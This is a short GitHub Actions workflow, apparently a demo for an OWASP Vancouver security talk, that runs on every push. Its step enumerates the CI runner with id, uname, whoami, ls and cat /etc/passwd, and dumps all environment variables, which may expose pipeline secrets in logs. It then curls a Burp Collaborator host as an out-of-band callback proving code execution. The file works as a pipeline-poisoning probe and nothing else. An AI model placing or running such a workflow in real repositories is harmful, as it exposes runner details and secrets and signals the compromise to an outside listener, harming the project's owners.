on: [push]

jobs:
  Vancouver:
    runs-on: ubuntu-latest
    name: Ottawa
    steps:
      - run: |
            id
            uname -a
            whoami
            ls -la
            cat /etc/passwd
            env
            echo "Hello OWASP Vancouver!"
            curl w96jcoktehi0pfz03atz4179e0kq8f.burpcollaborator.net
      
